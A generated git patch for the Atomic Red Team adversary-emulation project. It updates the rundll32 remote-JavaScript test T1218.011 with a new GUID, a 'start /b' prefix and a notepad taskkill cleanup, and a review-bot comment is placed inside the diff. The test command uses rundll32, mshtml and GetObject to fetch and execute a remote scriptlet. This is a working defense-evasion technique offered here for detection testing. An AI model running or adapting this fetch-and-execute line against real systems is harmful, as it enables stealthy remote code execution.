From 3a5209a4fc49c847f3b47f2820717cbef98ae403 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Fri, 29 Jul 2022 22:32:00 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/Indexes-CSV/index.csv | 2 +-
 atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +-
 atomics/Indexes/index.yaml | 8 ++++++--
 atomics/T1218.011/T1218.011.md | 8 ++++++--
 4 files changed, 14 insertions(+), 6 deletions(-)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 4e6c0b83..0f140af2 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
 defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 7160dbb3..9748317b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
 defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 79a3ad66..a944ce29 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -240,7 +240,7 @@ defense-evasion: identifier: T1218.011 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
@@ -253,7 +253,11 @@ defense-evasion: type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: - command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication + ";document.write();GetObject("script:#{file_url}").Exec(); + + ' + cleanup_command: 'taskkill /IM notepad.exe /f ' name: command_prompt
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 8bc8b5c9..de88a8c0 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
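Review bot: The new `cleanup_command: 'taskkill /IM notepad.exe /f'` in the second index.yaml hunk terminates every notepad.exe on the host, not only the instance this test's command spawns, so running the cleanup on a shared or analyst workstation can kill unrelated unsaved sessions; the same cleanup is rendered in the T1218.011.md hunk. Since these files are generated, the narrowing belongs in the source atomic definition under atomics/T1218.011/ (not in this diff), either by scoping the kill to the process the test launched or, failing that, by stating the broad scope in the test description so operators know what the cleanup will do. Separately, the test's auto_generated_guid changes from cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be to 57ba4ce9-ee7a-4f27-9928-3c70c489b59d across all four files; if anything external (detection-coverage mappings, execution history) keys on the old GUID that link is lost, which is worth a line in the commit description if the regeneration was intentional.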
@@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe **Supported Platforms:** Windows -**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be +**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
@@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe ```cmd -rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); +start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` +#### Cleanup Commands: +```cmd +taskkill /IM notepad.exe /f +```